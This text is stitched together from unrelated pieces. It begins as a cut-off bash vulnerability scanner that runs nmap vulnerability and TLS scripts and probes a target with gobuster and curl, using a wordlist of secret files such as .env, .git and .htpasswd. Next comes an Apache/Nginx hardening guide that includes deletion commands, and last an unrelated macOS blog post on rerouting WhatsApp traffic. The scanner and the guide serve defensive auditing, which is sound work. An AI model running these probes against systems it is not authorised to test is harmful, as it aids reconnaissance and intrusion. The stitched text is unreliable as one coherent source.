    nmap -sV -sC --script vuln,http-vulners-regex \
         --script-args vulns.showall,http-vulners-regex.paths={/} \
         -p "$OPEN_PORTS" \
         -oX "$RAW_OUTPUT" \
         -oN "${OUTPUT_DIR}/scan_normal.txt" \
         "$TARGET"
    
    if [ $? -ne 0 ]; then
        echo -e "${RED}Error: Nmap scan failed${NC}"
        # Don't exit, continue with other scans
    fi
}

# Function to parse and categorize vulnerabilities
parse_vulnerabilities() {
    print_header "Parsing and Categorizing Vulnerabilities"
    
    # Initialize arrays
    declare -a critical_vulns=()
    declare -a high_vulns=()
    declare -a medium_vulns=()
    declare -a low_vulns=()
    declare -a info_vulns=()
    
    # Create temporary files for each severity
    CRITICAL_FILE="${OUTPUT_DIR}/critical.tmp"
    HIGH_FILE="${OUTPUT_DIR}/high.tmp"
    MEDIUM_FILE="${OUTPUT_DIR}/medium.tmp"
    LOW_FILE="${OUTPUT_DIR}/low.tmp"
    INFO_FILE="${OUTPUT_DIR}/info.tmp"
    
    # Clear temp files
    > "$CRITICAL_FILE"
    > "$HIGH_FILE"
    > "$MEDIUM_FILE"
    > "$LOW_FILE"
    > "$INFO_FILE"
    
    # Parse XML output for vulnerabilities
    if [ -f "$RAW_OUTPUT" ]; then
        # Extract script output and categorize by common vulnerability indicators
        grep -A 20 '<script id=".*vuln.*"' "$RAW_OUTPUT" | while read line; do
            if echo "$line" | grep -qi "CRITICAL\|CVE.*CRITICAL\|score.*9\|score.*10"; then
                echo "$line" >> "$CRITICAL_FILE"
            elif echo "$line" | grep -qi "HIGH\|CVE.*HIGH\|score.*[7-8]"; then
                echo "$line" >> "$HIGH_FILE"
            elif echo "$line" | grep -qi "MEDIUM\|CVE.*MEDIUM\|score.*[4-6]"; then
                echo "$line" >> "$MEDIUM_FILE"
            elif echo "$line" | grep -qi "LOW\|CVE.*LOW\|score.*[1-3]"; then
                echo "$line" >> "$LOW_FILE"
            elif echo "$line" | grep -qi "INFO\|INFORMATION"; then
                echo "$line" >> "$INFO_FILE"
            fi
        done
        
        # Also parse normal output for vulnerability information
        if [ -f "${OUTPUT_DIR}/scan_normal.txt" ]; then
            # Look for common vulnerability patterns in normal output
            grep -E "(CVE-|VULNERABLE|State: VULNERABLE)" "${OUTPUT_DIR}/scan_normal.txt" | while read vuln_line; do
                if echo "$vuln_line" | grep -qi "critical\|9\.[0-9]\|10\.0"; then
                    echo "$vuln_line" >> "$CRITICAL_FILE"
                elif echo "$vuln_line" | grep -qi "high\|[7-8]\.[0-9]"; then
                    echo "$vuln_line" >> "$HIGH_FILE"
                elif echo "$vuln_line" | grep -qi "medium\|[4-6]\.[0-9]"; then
                    echo "$vuln_line" >> "$MEDIUM_FILE"
                elif echo "$vuln_line" | grep -qi "low\|[1-3]\.[0-9]"; then
                    echo "$vuln_line" >> "$LOW_FILE"
                else
                    echo "$vuln_line" >> "$INFO_FILE"
                fi
            done
        fi
    fi
}

# Function to display vulnerabilities by severity
display_results() {
    print_header "VULNERABILITY SCAN RESULTS"
    
    # Critical Vulnerabilities
    echo -e "\n${RED}🔴 CRITICAL SEVERITY VULNERABILITIES${NC}"
    echo "=================================================="
    if [ -s "${OUTPUT_DIR}/critical.tmp" ]; then
        cat "${OUTPUT_DIR}/critical.tmp" | head -20
        CRITICAL_COUNT=$(wc -l < "${OUTPUT_DIR}/critical.tmp")
        echo -e "${RED}Total Critical: $CRITICAL_COUNT${NC}"
    else
        echo -e "${GREEN}✓ No critical vulnerabilities found${NC}"
    fi
    
    # High Vulnerabilities
    echo -e "\n${ORANGE}🟠 HIGH SEVERITY VULNERABILITIES${NC}"
    echo "============================================="
    if [ -s "${OUTPUT_DIR}/high.tmp" ]; then
        cat "${OUTPUT_DIR}/high.tmp" | head -15
        HIGH_COUNT=$(wc -l < "${OUTPUT_DIR}/high.tmp")
        echo -e "${ORANGE}Total High: $HIGH_COUNT${NC}"
    else
        echo -e "${GREEN}✓ No high severity vulnerabilities found${NC}"
    fi
    
    # Medium Vulnerabilities
    echo -e "\n${YELLOW}🟡 MEDIUM SEVERITY VULNERABILITIES${NC}"
    echo "==============================================="
    if [ -s "${OUTPUT_DIR}/medium.tmp" ]; then
        cat "${OUTPUT_DIR}/medium.tmp" | head -10
        MEDIUM_COUNT=$(wc -l < "${OUTPUT_DIR}/medium.tmp")
        echo -e "${YELLOW}Total Medium: $MEDIUM_COUNT${NC}"
    else
        echo -e "${GREEN}✓ No medium severity vulnerabilities found${NC}"
    fi
    
    # Low Vulnerabilities
    echo -e "\n${BLUE}🔵 LOW SEVERITY VULNERABILITIES${NC}"
    echo "=========================================="
    if [ -s "${OUTPUT_DIR}/low.tmp" ]; then
        cat "${OUTPUT_DIR}/low.tmp" | head -8
        LOW_COUNT=$(wc -l < "${OUTPUT_DIR}/low.tmp")
        echo -e "${BLUE}Total Low: $LOW_COUNT${NC}"
    else
        echo -e "${GREEN}✓ No low severity vulnerabilities found${NC}"
    fi
    
    # Information/Other
    echo -e "\n${GREEN}ℹ️  INFORMATIONAL${NC}"
    echo "========================="
    if [ -s "${OUTPUT_DIR}/info.tmp" ]; then
        cat "${OUTPUT_DIR}/info.tmp" | head -5
        INFO_COUNT=$(wc -l < "${OUTPUT_DIR}/info.tmp")
        echo -e "${GREEN}Total Info: $INFO_COUNT${NC}"
    else
        echo "No informational items found"
    fi
}

# Function to run gobuster scan for enhanced directory discovery
run_gobuster_scan() {
    echo "Running gobuster directory scan..."
    
    GOBUSTER_RESULTS="${OUTPUT_DIR}/gobuster_results.txt"
    PERMISSION_ANALYSIS="${OUTPUT_DIR}/gobuster_permissions.txt"
    > "$PERMISSION_ANALYSIS"
    
    for port in $(echo "$WEB_PORTS" | tr ',' ' '); do
        PROTOCOL="http"
        if [[ "$port" == "443" || "$port" == "8443" ]]; then
            PROTOCOL="https"
        fi
        
        echo "Scanning $PROTOCOL://$TARGET:$port with gobuster..."
        
        # Run gobuster with common wordlist
        if [ -f "/usr/share/wordlists/dirb/common.txt" ]; then
            WORDLIST="/usr/share/wordlists/dirb/common.txt"
        elif [ -f "/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt" ]; then
            WORDLIST="/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt"
        else
            # Create a small built-in wordlist
            WORDLIST="${OUTPUT_DIR}/temp_wordlist.txt"
            cat > "$WORDLIST" <<EOF
admin
administrator
api
backup
bin
cgi-bin
config
data
database
db
debug
dev
development
doc
docs
documentation
download
downloads
error
errors
export
files
hidden
images
img
include
includes
js
library
log
logs
manage
management
manager
media
old
private
proc
public
resources
scripts
secret
secure
server-status
staging
static
storage
system
temp
templates
test
testing
tmp
upload
uploads
users
var
vendor
web
webapp
wp-admin
wp-content
.git
.svn
.env
.htaccess
.htpasswd
robots.txt
sitemap.xml
web.config
phpinfo.php
info.php
test.php
EOF
        fi
        
        # Run gobuster with status code analysis
        gobuster dir -u "$PROTOCOL://$TARGET:$port" \
                    -w "$WORDLIST" \
                    -k \
                    -t 10 \
                    --no-error \
                    -o "${GOBUSTER_RESULTS}_${port}.txt" \
                    -s "200,204,301,302,307,401,403,405" 2>/dev/null
        
        # Analyze results for permission issues
        if [ -f "${GOBUSTER_RESULTS}_${port}.txt" ]; then
            echo "Analyzing gobuster results for permission issues..."
            
            # Check for 403 Forbidden directories
            grep "Status: 403" "${GOBUSTER_RESULTS}_${port}.txt" | while read line; do
                dir=$(echo "$line" | awk '{print $1}')
                echo -e "${ORANGE}[403 Forbidden]${NC} $PROTOCOL://$TARGET:$port$dir - Directory exists but access denied" >> "$PERMISSION_ANALYSIS"
                echo -e "${ORANGE}  Permission Issue:${NC} $PROTOCOL://$TARGET:$port$dir (403 Forbidden)"
            done
            
            # Check for 401 Unauthorized directories
            grep "Status: 401" "${GOBUSTER_RESULTS}_${port}.txt" | while read line; do
                dir=$(echo "$line" | awk '{print $1}')
                echo -e "${YELLOW}[401 Unauthorized]${NC} $PROTOCOL://$TARGET:$port$dir - Authentication required" >> "$PERMISSION_ANALYSIS"
                echo -e "${YELLOW}  Auth Required:${NC} $PROTOCOL://$TARGET:$port$dir (401 Unauthorized)"
            done
            
            # Check for directory listing enabled (potentially dangerous)
            grep "Status: 200" "${GOBUSTER_RESULTS}_${port}.txt" | while read line; do
                dir=$(echo "$line" | awk '{print $1}')
                # Check if it's a directory by looking for trailing slash or common directory patterns
                if [[ "$dir" =~ /$ ]] || [[ ! "$dir" =~ \. ]]; then
                    # Test if directory listing is enabled
                    RESPONSE=$(curl -k -s --max-time 5 "$PROTOCOL://$TARGET:$port$dir" 2>/dev/null)
                    if echo "$RESPONSE" | grep -qi "index of\|directory listing\|parent directory\|<pre>\|<dir>"; then
                        echo -e "${RED}[Directory Listing Enabled]${NC} $PROTOCOL://$TARGET:$port$dir - SECURITY RISK" >> "$PERMISSION_ANALYSIS"
                        echo -e "${RED}  🚨 Directory Listing:${NC} $PROTOCOL://$TARGET:$port$dir"
                    fi
                fi
            done
            
            # Check for sensitive files with incorrect permissions
            for sensitive_file in ".git/config" ".env" ".htpasswd" "web.config" "phpinfo.php" "info.php" ".DS_Store" "Thumbs.db"; do
                if grep -q "/$sensitive_file.*Status: 200" "${GOBUSTER_RESULTS}_${port}.txt"; then
                    echo -e "${RED}[Sensitive File Exposed]${NC} $PROTOCOL://$TARGET:$port/$sensitive_file - CRITICAL SECURITY RISK" >> "$PERMISSION_ANALYSIS"
                    echo -e "${RED}  🚨 Sensitive File:${NC} $PROTOCOL://$TARGET:$port/$sensitive_file"
                fi
            done
        fi
    done
    
    # Clean up temporary wordlist if created
    [ -f "${OUTPUT_DIR}/temp_wordlist.txt" ] && rm -f "${OUTPUT_DIR}/temp_wordlist.txt"
    
    # Display permission analysis summary
    if [ -s "$PERMISSION_ANALYSIS" ]; then
        echo ""
        echo -e "${ORANGE}=== Directory Permission Issues Summary ===${NC}"
        cat "$PERMISSION_ANALYSIS"
        
        # Count different types of issues
        # grep -c prints 0 on its own when nothing matches, so no "|| echo 0" fallback is needed
        FORBIDDEN_COUNT=$(grep -c "403 Forbidden" "$PERMISSION_ANALYSIS" 2>/dev/null)
        UNAUTH_COUNT=$(grep -c "401 Unauthorized" "$PERMISSION_ANALYSIS" 2>/dev/null)
        LISTING_COUNT=$(grep -c "Directory Listing Enabled" "$PERMISSION_ANALYSIS" 2>/dev/null)
        SENSITIVE_COUNT=$(grep -c "Sensitive File Exposed" "$PERMISSION_ANALYSIS" 2>/dev/null)
        
        echo ""
        echo "Permission Issue Statistics:"
        echo "  - 403 Forbidden directories: $FORBIDDEN_COUNT"
        echo "  - 401 Unauthorized directories: $UNAUTH_COUNT"
        echo "  - Directory listings enabled: $LISTING_COUNT"
        echo "  - Sensitive files exposed: $SENSITIVE_COUNT"
    fi
}

# Function to run TLS/SSL checks
run_tls_checks() {
    print_header "Running TLS/SSL Security Checks"
    
    # Check for HTTPS ports
    HTTPS_PORTS=$(echo "$OPEN_PORTS" | tr ',' '\n' | grep -E '443|8443' | tr '\n' ',' | sed 's/,$//')
    if [ -z "$HTTPS_PORTS" ]; then
        HTTPS_PORTS="443"
        echo "No HTTPS ports found in scan, checking default port 443..."
    fi
    
    echo "Checking TLS/SSL on ports: $HTTPS_PORTS"
    
    # Run SSL scan using nmap ssl scripts
    nmap -sV --script ssl-cert,ssl-enum-ciphers,ssl-known-key,ssl-ccs-injection,ssl-heartbleed,ssl-poodle,sslv2,tls-alpn,tls-nextprotoneg \
         -p "$HTTPS_PORTS" \
         -oN "${OUTPUT_DIR}/tls_scan.txt" \
         "$TARGET" 2>/dev/null
    
    # Parse TLS results
    TLS_ISSUES_FILE="${OUTPUT_DIR}/tls_issues.txt"
    > "$TLS_ISSUES_FILE"
    
    # Check for weak ciphers
    if grep -q "TLSv1.0\|SSLv2\|SSLv3" "${OUTPUT_DIR}/tls_scan.txt" 2>/dev/null; then
        echo "CRITICAL: Outdated SSL/TLS protocols detected" >> "$TLS_ISSUES_FILE"
    fi
    
    # Check for weak cipher suites
    if grep -q "DES\|RC4\|MD5" "${OUTPUT_DIR}/tls_scan.txt" 2>/dev/null; then
        echo "HIGH: Weak cipher suites detected" >> "$TLS_ISSUES_FILE"
    fi
    
    # Check for certificate issues
    if grep -q "expired\|self-signed" "${OUTPUT_DIR}/tls_scan.txt" 2>/dev/null; then
        echo "MEDIUM: Certificate issues detected" >> "$TLS_ISSUES_FILE"
    fi
    
    # Display TLS results
    echo ""
    if [ -s "$TLS_ISSUES_FILE" ]; then
        echo -e "${RED}TLS/SSL Issues Found:${NC}"
        cat "$TLS_ISSUES_FILE"
    else
        echo -e "${GREEN}✓ No major TLS/SSL issues detected${NC}"
    fi
    echo ""
}

# Function to run directory busting and permission checks
run_dirbuster() {
    print_header "Running Directory Discovery and Permission Checks"
    
    # Check for web ports
    WEB_PORTS=$(echo "$OPEN_PORTS" | tr ',' '\n' | grep -E '^(80|443|8080|8443)$' | tr '\n' ',' | sed 's/,$//')
    if [ -z "$WEB_PORTS" ]; then
        echo "No standard web ports found in open ports, checking defaults..."
        WEB_PORTS="80,443"
    fi
    
    echo "Running directory discovery on web ports: $WEB_PORTS"
    
    # Check if gobuster is available
    if command -v gobuster &> /dev/null; then
        echo -e "${GREEN}Using gobuster for enhanced directory discovery and permission checks${NC}"
        run_gobuster_scan
    else
        echo -e "${YELLOW}Gobuster not found. Using fallback method.${NC}"
        echo -e "${YELLOW}Install gobuster for enhanced directory permission checks: brew install gobuster${NC}"
    fi
    
    # Use nmap's http-enum script for directory discovery
    nmap -sV --script http-enum \
         --script-args http-enum.basepath='/' \
         -p "$WEB_PORTS" \
         -oN "${OUTPUT_DIR}/dirbuster.txt" \
         "$TARGET" 2>/dev/null
    
    # Common directory wordlist (built-in small list)
    COMMON_DIRS="admin administrator backup api config test dev staging uploads download downloads files documents images img css js scripts cgi-bin wp-admin phpmyadmin .git .svn .env .htaccess robots.txt sitemap.xml"
    
    # Quick check for common directories using curl
    DIRS_FOUND_FILE="${OUTPUT_DIR}/directories_found.txt"
    > "$DIRS_FOUND_FILE"
    
    for port in $(echo "$WEB_PORTS" | tr ',' ' '); do
        PROTOCOL="http"
        if [[ "$port" == "443" || "$port" == "8443" ]]; then
            PROTOCOL="https"
        fi
        
        echo "Checking common directories on $PROTOCOL://$TARGET:$port"
        
        for dir in $COMMON_DIRS; do
            URL="$PROTOCOL://$TARGET:$port/$dir"
            STATUS=$(curl -k -s -o /dev/null -w "%{http_code}" --max-time 3 "$URL" 2>/dev/null)
            
            if [[ "$STATUS" == "200" || "$STATUS" == "301" || "$STATUS" == "302" || "$STATUS" == "401" || "$STATUS" == "403" ]]; then
                echo "[$STATUS] $URL" >> "$DIRS_FOUND_FILE"
                echo -e "${GREEN}Found:${NC} [$STATUS] $URL"
                
                # Check for permission issues
                if [[ "$STATUS" == "403" ]]; then
                    echo -e "${ORANGE}  ⚠️  Permission denied (403) - Possible misconfiguration${NC}"
                    echo "[PERMISSION ISSUE] 403 Forbidden: $URL" >> "${OUTPUT_DIR}/permission_issues.txt"
                elif [[ "$STATUS" == "401" ]]; then
                    echo -e "${YELLOW}  🔒 Authentication required (401)${NC}"
                    echo "[AUTH REQUIRED] 401 Unauthorized: $URL" >> "${OUTPUT_DIR}/permission_issues.txt"
                fi
            fi
        done
    done
    
    # Display results
    echo ""
    if [ -s "$DIRS_FOUND_FILE" ]; then
        echo -e "${YELLOW}Directories/Files discovered:${NC}"
        cat "$DIRS_FOUND_FILE"
    else
        echo "No additional directories found"
    fi
    
    # Display permission issues if found
    if [ -s "${OUTPUT_DIR}/permission_issues.txt" ]; then
        echo ""
        echo -e "${ORANGE}Directory Permission Issues Found:${NC}"
        cat "${OUTPUT_DIR}/permission_issues.txt"
    fi
    echo ""
}

# Function to generate summary report
generate_summary() {
    print_header "SCAN SUMMARY"
    
    CRITICAL_COUNT=0
    HIGH_COUNT=0
    MEDIUM_COUNT=0
    LOW_COUNT=0
    INFO_COUNT=0
    
    [ -f "${OUTPUT_DIR}/critical.tmp" ] && CRITICAL_COUNT=$(wc -l < "${OUTPUT_DIR}/critical.tmp")
    [ -f "${OUTPUT_DIR}/high.tmp" ] && HIGH_COUNT=$(wc -l < "${OUTPUT_DIR}/high.tmp")
    [ -f "${OUTPUT_DIR}/medium.tmp" ] && MEDIUM_COUNT=$(wc -l < "${OUTPUT_DIR}/medium.tmp")
    [ -f "${OUTPUT_DIR}/low.tmp" ] && LOW_COUNT=$(wc -l < "${OUTPUT_DIR}/low.tmp")
    [ -f "${OUTPUT_DIR}/info.tmp" ] && INFO_COUNT=$(wc -l < "${OUTPUT_DIR}/info.tmp")
    
    echo "Target: $TARGET"
    echo "Scan Date: $(date)"
    echo ""
    echo -e "${RED}Critical:       $CRITICAL_COUNT${NC}"
    echo -e "${ORANGE}High:           $HIGH_COUNT${NC}"
    echo -e "${YELLOW}Medium:         $MEDIUM_COUNT${NC}"
    echo -e "${BLUE}Low:            $LOW_COUNT${NC}"
    echo -e "${GREEN}Informational:  $INFO_COUNT${NC}"
    echo ""
    
    TOTAL=$((CRITICAL_COUNT + HIGH_COUNT + MEDIUM_COUNT + LOW_COUNT))
    echo "Total Vulnerabilities: $TOTAL"
    
    # Risk assessment
    if [ $CRITICAL_COUNT -gt 0 ]; then
        echo -e "${RED}🚨 RISK LEVEL: CRITICAL - Immediate action required!${NC}"
    elif [ $HIGH_COUNT -gt 0 ]; then
        echo -e "${ORANGE}⚠️  RISK LEVEL: HIGH - Action required soon${NC}"
    elif [ $MEDIUM_COUNT -gt 0 ]; then
        echo -e "${YELLOW}⚡ RISK LEVEL: MEDIUM - Should be addressed${NC}"
    elif [ $LOW_COUNT -gt 0 ]; then
        echo -e "${BLUE}📋 RISK LEVEL: LOW - Monitor and plan fixes${NC}"
    else
        echo -e "${GREEN}✅ RISK LEVEL: MINIMAL - Good security posture${NC}"
    fi
    
    # Save summary to file
    {
        echo "Vulnerability Scan Summary for $TARGET"
        echo "======================================"
        echo "Scan Date: $(date)"
        echo ""
        echo "Critical: $CRITICAL_COUNT"
        echo "High: $HIGH_COUNT"
        echo "Medium: $MEDIUM_COUNT"
        echo "Low: $LOW_COUNT"
        echo "Informational: $INFO_COUNT"
        echo "Total: $TOTAL"
        echo ""
        echo "Additional Checks:"
        [ -f "${OUTPUT_DIR}/tls_issues.txt" ] && [ -s "${OUTPUT_DIR}/tls_issues.txt" ] && echo "TLS/SSL Issues: $(wc -l < "${OUTPUT_DIR}/tls_issues.txt")"
        [ -f "${OUTPUT_DIR}/directories_found.txt" ] && [ -s "${OUTPUT_DIR}/directories_found.txt" ] && echo "Directories Found: $(wc -l < "${OUTPUT_DIR}/directories_found.txt")"
        [ -f "${OUTPUT_DIR}/gobuster_permissions.txt" ] && [ -s "${OUTPUT_DIR}/gobuster_permissions.txt" ] && echo "Directory Permission Issues: $(wc -l < "${OUTPUT_DIR}/gobuster_permissions.txt")"
    } > "${OUTPUT_DIR}/summary.txt"
}

# Main execution
main() {
    echo "Starting vulnerability scan for $TARGET…"
    
    # Check if required tools are installed
    if ! command -v nmap &> /dev/null; then
        echo -e "${RED}Error: nmap is not installed. Please install nmap first.${NC}"
        exit 1
    fi
    
    if ! command -v curl &> /dev/null; then
        echo -e "${RED}Error: curl is not installed. Please install curl first.${NC}"
        exit 1
    fi
    
    # Check for optional tools
    if command -v gobuster &> /dev/null; then
        echo -e "${GREEN}✓ Gobuster found - Enhanced directory scanning enabled${NC}"
    else
        echo -e "${YELLOW}ℹ️  Gobuster not found - Basic directory scanning will be used${NC}"
        echo -e "${YELLOW}   Install with: brew install gobuster (macOS) or apt install gobuster (Linux)${NC}"
    fi
    
    # Run the main vulnerability scan
    run_scan
    
    # Run TLS/SSL checks
    run_tls_checks
    
    # Run directory discovery
    run_dirbuster
    
    # Parse results
    parse_vulnerabilities
    
    # Display formatted results
    display_results
    
    # Generate summary
    generate_summary
    
    # Cleanup temporary files
    rm -f "${OUTPUT_DIR}"/*.tmp
    
    print_header "SCAN COMPLETE"
    echo "All results saved in: $OUTPUT_DIR"
    echo "Summary saved in: ${OUTPUT_DIR}/summary.txt"
    echo -e "${GREEN}Scan completed at: $(date)${NC}"
}

# Run main function
main

Here’s a comprehensive guide on how to fix each type of directory permission issue that the above script might find (for Apache, with Nginx equivalents where relevant):

## 1. **403 Forbidden Errors**

### What it means:
The directory/file exists but the server is denying access to it.

### How to fix:
# For Apache (.htaccess)
# Add to .htaccess in the directory:
Order deny,allow
Deny from all

# Or remove the directory from web access entirely
# Move sensitive directories outside the web root
mv /var/www/html/backup /var/backups/

# For Nginx
# Add to nginx.conf:
location /admin {
    deny all;
    return 404;  # Return 404 instead of 403 to hide existence
}
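
Note that the Order/Deny lines in the Apache snippet above use the older 2.2 syntax. On Apache 2.4 and later the equivalent deny-all rule uses the Require directive; a minimal example:

# Apache 2.4+ equivalent of "Order deny,allow" + "Deny from all"
# Add to .htaccess or a <Directory> block:
Require all denied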
## 2. **401 Unauthorized Errors**

### What it means:
Authentication is required but may not be properly configured.

### How to fix:
# For Apache - create .htpasswd file
htpasswd -c /etc/apache2/.htpasswd username

# Add to .htaccess:
AuthType Basic
AuthName "Restricted Access"
AuthUserFile /etc/apache2/.htpasswd
Require valid-user

# For Nginx:
# Install apache2-utils for htpasswd
sudo apt-get install apache2-utils
htpasswd -c /etc/nginx/.htpasswd username

# Add to nginx.conf:
location /admin {
    auth_basic "Restricted Access";
    auth_basic_user_file /etc/nginx/.htpasswd;
}
## 3. **Directory Listing Enabled (CRITICAL)**

### What it means:
Anyone can see all files in the directory - major security risk!

### How to fix:
# For Apache
# Method 1: Add to .htaccess in the directory
Options -Indexes

# Method 2: Add to Apache config (httpd.conf or apache2.conf)
<Directory /var/www/html>
    Options -Indexes
</Directory>

# For Nginx
# Add to nginx.conf (Nginx doesn't have directory listing by default)
# If you see it enabled, remove:
autoindex off;  # This should be the default

# Create index files in empty directories
echo "<!DOCTYPE html><html><head><title>403 Forbidden</title></head><body><h1>403 Forbidden</h1></body></html>" > index.html
## 4. **Sensitive Files Exposed (CRITICAL)**

### Common exposed files and fixes:

#### **.git directory**
# Remove .git from production
rm -rf /var/www/html/.git

# Or block access via .htaccess
# (a <Files> block only matches file names, not paths under .git/,
#  so use RedirectMatch to hide the whole directory)
RedirectMatch 404 /\.git

# For Nginx:
location ~ /\.git {
    deny all;
    return 404;
}
#### **.env file**
# Move outside web root
mv /var/www/html/.env /var/www/

# Update your application to load the .env file from its new location
# (e.g. point your dotenv loader at /var/www/ instead of the web root;
#  a .env file is not PHP code, so don't require/include it directly)

# Block via .htaccess
<Files .env>
    Order allow,deny
    Deny from all
</Files>
#### **Configuration files (config.php, settings.php)**
# Move sensitive configs outside web root
mv /var/www/html/config.php /var/www/config/

# Or restrict access via .htaccess
<Files "config.php">
    Order allow,deny
    Deny from all
</Files>
#### **Backup files**
# Remove backup files from web directory
find /var/www/html -type f \( -name "*.bak" -o -name "*.backup" -o -name "*.old" \) -delete

# Create a cron job to clean regularly
# (the \( \) grouping is needed so -delete applies to both name patterns)
echo "0 2 * * * find /var/www/html -type f \( -name '*.bak' -o -name '*.backup' \) -delete" | crontab -
## 5. **General Security Best Practices**

### Create a comprehensive .htaccess file:
# Disable directory browsing
Options -Indexes

# Deny access to hidden files and directories
<Files .*>
    Order allow,deny
    Deny from all
</Files>

# Deny access to backup and source files
<FilesMatch "(\.(bak|backup|config|dist|fla|inc|ini|log|psd|sh|sql|swp)|~)$">
    Order allow,deny
    Deny from all
</FilesMatch>

# Protect sensitive files
# (the block below is the Nginx equivalent; it goes in the server config, not in .htaccess)
location ~ /(\.htaccess|\.htpasswd|\.env|composer\.json|composer\.lock|package\.json|package-lock\.json)$ {
    deny all;
    return 404;
}

## 6. Quick Security Audit Commands
## Run these commands to find and fix common issues:

# Find all .git directories in web root
find /var/www/html -type d -name .git

# Find all .env files
find /var/www/html -name .env

# Find all backup files
find /var/www/html -type f \( -name "*.bak" -o -name "*.backup" -o -name "*.old" -o -name "*~" \)

# Find directories without index files (potential listing)
find /var/www/html -type d -exec sh -c '[ ! -f "$1/index.html" ] && [ ! -f "$1/index.php" ] && echo "$1"' _ {} \;

# Set proper permissions
find /var/www/html -type d -exec chmod 755 {} \;
find /var/www/html -type f -exec chmod 644 {} \;

## 7. Testing Your Fixes
## After implementing fixes, test them:

# Test that sensitive files are blocked
curl -I https://yoursite.com/.git/config
# Should return 403 or 404

# Test that directory listing is disabled
curl https://yoursite.com/images/
# Should not show a file list

# Run the vunscan.sh script again
./vunscan.sh yoursite.com
# Verify issues are resolved
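
To spot-check several sensitive paths in one go, a small loop along these lines works (a rough sketch; replace yoursite.com and the path list with your own):

# Print the HTTP status code for a handful of sensitive paths
for path in .git/config .env config.php backup/ admin/; do
    status=$(curl -s -o /dev/null -w "%{http_code}" "https://yoursite.com/${path}")
    echo "${status}  /${path}"
done
# Anything returning 200 here deserves a closer look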


## 8. Preventive Measures
## 1. Use a deployment script that excludes sensitive files:
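A minimal sketch of such a deployment step, assuming an rsync-based deploy where user@server and the web root path are placeholders:

# Deploy the site while excluding VCS data, secrets and backup files
rsync -av --delete \
    --exclude '.git/' \
    --exclude '.env' \
    --exclude '*.bak' --exclude '*.backup' --exclude '*.old' \
    ./ user@server:/var/www/html/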
## 2. Regular security scans:
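For example, a cron entry that re-runs the scan script above once a week and keeps a log (the script path and log location are assumptions):

# Run the vulnerability scan every Monday at 03:00 and append the output to a log
0 3 * * 1 /usr/local/bin/vunscan.sh yoursite.com >> /var/log/vunscan.log 2>&1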
## 3. Use a Web Application Firewall (WAF) like ModSecurity or Cloudflare

# Remember: The goal is not just to hide these files (security through obscurity) but to properly secure them or remove them from the web-accessible directory entirely.

macOS: altering the routing table to redirect a website's traffic to a different interface (e.g. re-routing WhatsApp traffic to en0)

This was a hard article to figure out a title for! Put simply, your MacBook has a routing table, and if you want to move traffic for a specific IP address or DNS name from one interface to another, follow the steps below:

First, find the IP address of the website whose traffic you want to re-route:

$ nslookup web.whatsapp.com
Server:		100.64.0.1
Address:	100.64.0.1#53

Non-authoritative answer:
web.whatsapp.com	canonical name = mmx-ds.cdn.whatsapp.net.
Name:	mmx-ds.cdn.whatsapp.net
Address: 102.132.99.60

We want to re-route the traffic for 102.132.99.60 to the default interface. First, let's find out which interface this traffic is currently routed through:

$ route -n get web.whatsapp.com
   route to: 102.132.99.60
destination: 102.132.99.60
    gateway: 100.64.0.1
  interface: utun0
      flags: <UP,GATEWAY,HOST,DONE,WASCLONED,IFSCOPE,IFREF>
 recvpipe  sendpipe  ssthresh  rtt,msec    rttvar  hopcount      mtu     expire
       0         0         0        34        21         0      1400         0

So this traffic is currently going to a tunnelled interface called utun0 via gateway 100.64.0.1.

OK, so I want to move it off this tunnelled interface. A quick look at the active connections confirms there is an established connection to the WhatsApp CDN:

$ netstat | head -n 5
Active Internet connections
Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
tcp4       0    126  100.64.0.1.64770       136.226.216.14.https   ESTABLISHED
tcp4       0      0  100.64.0.1.64768       whatsapp-cdn-shv.https ESTABLISHED
tcp4       0      0  100.64.0.1.64766       52.178.17.3.https      ESTABLISHED

Now we want to re-route WhatsApp's traffic via the default route, so let's display the kernel routing table and find the default gateway. The -n option forces netstat to print IP addresses; without it, netstat attempts to display host names.

$ netstat -nr | grep default
default            192.168.8.1        UGScg                 en0
default                                 fe80::%utun1                            UGcIg               utun1
default                                 fe80::%utun2                            UGcIg               utun2
default                                 fe80::%utun3                            UGcIg               utun3
default                                 fe80::%utun4                            UGcIg               utun4
default                                 fe80::%utun5                            UGcIg               utun5
default                                 fe80::%utun0                            UGcIg               utun0

We can see that the default IPv4 route goes out via en0 using gateway 192.168.8.1. So let's add a host route that sends WhatsApp's IP address via this gateway:

$ sudo route add 102.132.99.60 192.168.8.1
route: writing to routing socket: File exists
add host 102.132.99.60: gateway 192.168.8.1: File exists
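
The "File exists" message means a host route for this address is already present (for example from an earlier attempt), so the kernel refuses to add a duplicate. If you hit this, delete the existing host route first and add it again:

$ sudo route delete 102.132.99.60
$ sudo route add 102.132.99.60 192.168.8.1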

Now let's test whether we are routing via the new gateway:

$ route -n get 102.132.99.60
   route to: 102.132.99.60
destination: 102.132.99.60
    gateway: 192.168.8.1
  interface: utun6
      flags: <UP,GATEWAY,HOST,DONE,STATIC>
 recvpipe  sendpipe  ssthresh  rtt,msec    rttvar  hopcount      mtu     expire
       0         0         0         0         0         0      1400         0
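
The route now uses the 192.168.8.1 gateway, even though macOS still reports a utun interface here. To double-check which path packets actually take, a quick traceroute before and after adding the route is a simple sanity check (hop addresses will differ on your network):

$ traceroute -n -m 3 102.132.99.60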

Finally delete the route and recheck the routing:

$ sudo route delete 102.132.99.60
delete host 102.132.99.60

$ route -n get 102.132.99.60
   route to: 102.132.99.60
destination: 102.132.99.60
    gateway: 100.64.0.1
  interface: utun6
      flags: <UP,GATEWAY,HOST,DONE,WASCLONED,IFSCOPE,IFREF>
 recvpipe  sendpipe  ssthresh  rtt,msec    rttvar  hopcount      mtu     expire
       0         0         0         0         0         0      1400         0